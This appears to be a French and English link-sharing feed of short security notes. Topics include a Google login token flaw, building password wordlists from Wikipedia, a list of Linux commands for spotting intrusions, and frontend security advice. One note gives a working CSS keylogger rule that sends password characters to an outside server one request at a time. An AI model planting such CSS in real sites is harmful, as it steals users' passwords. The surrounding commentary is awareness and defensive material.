Kids have cracked the login screen by bypassing the password with a coredump by typing like crazy on the virtual and physical keyboards 🤣
Il y a des gens pour créer des ceintures de chastetés connectées.
Et d'autres pour les pirater !
Une faille de sécurité découverte en cliquant sur le bouton "Se connecter avec Google". Elle permet d'y voler le token maître avec un tour de passe-passe, et donc d'avoir accès à toutes les informations du compte Google en question... 😱
Pour se faire une liste des mots pour des attaques de mots de passes par dictionnaires : récupérer les mots de Wikipedia
An exploit explained
w & who pour savoir qui est connecté,
last & lastb pour savoir qui a été connecté,
history (lancé depuis l'utilisateur à vérifier : su username) pour voir les traces laissées,
less /etc/passwd et cat /etc/passwd pour vérifier si on n'a pas créé un utilisateur à l'arrache,
ps et top pour vérifier s'il n'y a pas un processus malveillant,
ss & netstat pour vérifier les faiblesses réseau,
ip
crontab pour vérifier si une tâche cron n'est pas lancée régulièrement
find / -mtime -5 -ctime -5 pour vérifier les fichiers modifiés récemment,
cat /var/log/syslog, cat /var/log/syslog | less, tail -f -n 5 /var/log/syslog, cat /var/log/syslog | grep fail, tail -f /var/log/syslog pour les logs
Via https://shaarli.sebw.info/?aU81yg
(du hollandais volant)
TL;DR the low cost pentests are low cost because they only run automated tools; and they did not report vulnerabilities correctly.
An example with the JS code that copy/pasting from the shell commands from the web is a dangerous action
An example of live DDOS
Malin ! Un keylogger en CSS !
En fait un script génère pour tous les caractères ASCII, l'instruction CSS suivante :
input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}
Qui signifie que pour les champs de type password dont la valeur se termine par a, on va effectuer une requête externe vers un serveur avec la lettre a. On fait ça pour tous les caractères et hop on a le mot de passe.
(via https://links.hoa.ro/shaare/689gzA, via https://bookmarks.ecyseo.net/?cymp8g)
*Ne jamais faire confiance aux applications frontend
- N'utilisez pas votre propre cryptographie
- N'utilisez pas de clé de chiffrement prédictibles
- Ne réutilisez pas une clé de chiffrement
- Obfusquer n'est pas sécuriser
- Sécurisez plutôt votre backend
Et de bon conseils pratiques comme éviter d'utiliser des promesses pour traiter les requêtes du client, mais plutôt des callbacks
Tests the security of the SSL protocols for a server
It is hard to know if the equipment are patched... It's ugly; datas are not encrypted at a moment during transmission 😔
That's why end-to-end encryption is so important.
(via https://sebsauvage.net/links/?kbFs9w)